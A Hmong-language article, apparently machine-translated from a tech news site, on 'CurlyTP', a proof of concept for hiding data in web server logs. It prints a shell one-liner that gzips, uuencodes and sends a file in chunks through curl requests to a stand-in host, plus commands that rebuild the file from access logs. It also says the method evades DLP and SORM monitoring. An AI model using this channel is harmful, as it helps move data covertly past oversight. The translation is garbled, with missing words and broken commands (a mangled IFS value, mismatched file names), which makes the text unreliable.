Raws li Wikipedia txhais, qhov poob tuag yog ib qho cuab yeej sib koom ua ke uas ua haujlwm sib pauv ntaub ntawv lossis qee yam khoom ntawm tib neeg siv qhov chaw zais cia. Lub tswv yim yog tias tib neeg yeej tsis tau ntsib - tab sis lawv tseem sib pauv ntaub ntawv kom muaj kev nyab xeeb ntawm kev ua haujlwm.
Qhov chaw nkaum yuav tsum tsis txhob nyiam. Yog li ntawd, nyob rau hauv lub offline ntiaj teb no lawv feem ntau siv discreet yam: ib tug xoob cib nyob rau hauv lub phab ntsa, ib lub tsev qiv ntawv, los yog ib tug hollow nyob rau hauv ib tsob ntoo.
Muaj ntau cov cuab yeej encryption thiab tsis qhia npe hauv Is Taws Nem, tab sis qhov tseeb ntawm kev siv cov cuab yeej no nyiam mloog. Tsis tas li ntawd, lawv yuav raug thaiv ntawm cov tuam txhab lossis tsoomfwv qib. Yuav ua li cas?
Tus tsim tawm Ryan Flowers tau npaj ib qho kev xaiv nthuav - . Yog tias koj xav txog nws, lub web server ua li cas? Tau txais kev thov, teeb meem cov ntaub ntawv thiab sau cov cav. Thiab nws sau tag nrho cov lus thov, txawm yog cov uas tsis raug!
Nws hloov tawm tias txhua lub web server tso cai rau koj khaws yuav luag txhua cov lus hauv lub cav. Paj xav li cas siv qhov no.
Nws muaj qhov kev xaiv no:
- Siv cov ntawv nyeem (cov lus zais) thiab suav cov hash (md5sum).
- Peb encode nws (gzip + uuencode).
- Peb sau rau lub cav siv qhov kev thov tsis raug rau tus neeg rau zaub mov.
Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt
[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | shTxhawm rau nyeem cov ntaub ntawv, koj yuav tsum ua cov haujlwm no hauv qhov kev txiav txim rov qab: txiav txim siab thiab unzip cov ntaub ntawv, kos lub hash (tus hash tuaj yeem xa mus rau qhov chaw qhib).
Qhov chaw raug hloov nrog =+=kom tsis muaj chaw nyob hauv qhov chaw nyob. Qhov kev pab cuam, uas tus sau hu ua CurlyTP, siv base64 encoding, zoo li email attachments. Qhov kev thov yog ua nrog lo lus tseem ceeb ?transfer?kom tus neeg tau txais kev pab tau yooj yim pom nws hauv cov cav.
Peb pom dab tsi hauv cov cav hauv qhov no?
1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"Raws li twb tau hais lawm, kom tau txais cov lus zais koj yuav tsum ua cov haujlwm rov qab:
Remote machine
[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue
[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 gCov txheej txheem yog yooj yim rau automate. Md5sum ntais ntawv, thiab cov ntsiab lus ntawm cov ntaub ntawv paub meej tias txhua yam tau txiav txim kom raug.
Txoj kev no yooj yim heev. "Lub ntsiab lus ntawm qhov kev tawm dag zog no tsuas yog ua pov thawj tias cov ntaub ntawv tuaj yeem hloov mus los ntawm kev thov lub vev xaib me me, thiab nws ua haujlwm ntawm txhua lub vev xaib nrog cov ntawv sau yooj yim. Qhov tseem ceeb, txhua lub vev xaib server yog qhov chaw nkaum!β Paj sau.
Tau kawg, txoj kev tsuas yog ua haujlwm yog tias tus neeg tau txais kev nkag mus rau server cav. Tab sis xws li kev nkag tau muab, piv txwv li, los ntawm ntau tus tswv tsev.
Yuav siv li cas?
Ryan Flowers hais tias nws tsis yog tus kws paub txog kev ruaj ntseg cov ntaub ntawv thiab yuav tsis sau cov npe ntawm kev siv tau rau CurlyTP. Rau nws, nws tsuas yog ib qho pov thawj ntawm lub tswv yim hais tias cov cuab yeej paub peb pom txhua hnub tuaj yeem siv rau hauv txoj kev tsis sib xws.
Qhov tseeb, txoj kev no muaj ntau qhov zoo dua li lwm tus neeg rau zaub mov " nkaum" nyiam los yog : nws tsis xav tau kev teeb tsa tshwj xeeb ntawm sab server lossis ib qho kev cai tshwj xeeb - thiab yuav tsis ua rau muaj kev xav tsis thoob ntawm cov neeg saib xyuas kev khiav tsheb. Nws tsis zoo li qhov SORM lossis DLP system yuav luam theej duab URLs rau cov ntaub ntawv compressed.
Qhov no yog ib txoj hauv kev xa cov lus los ntawm kev pabcuam cov ntaub ntawv. Koj tuaj yeem nco ntsoov tias qee lub tuam txhab siab heev tau siv los tso los yog hauv cov cai ntawm nplooj ntawv HTML.
Lub tswv yim yog tias tsuas yog cov neeg tsim tawm lub vev xaib yuav pom lub qe Easter no, txij li ib tus neeg ib txwm yuav tsis saib cov headers lossis HTML code.
Tau qhov twg los: www.hab.com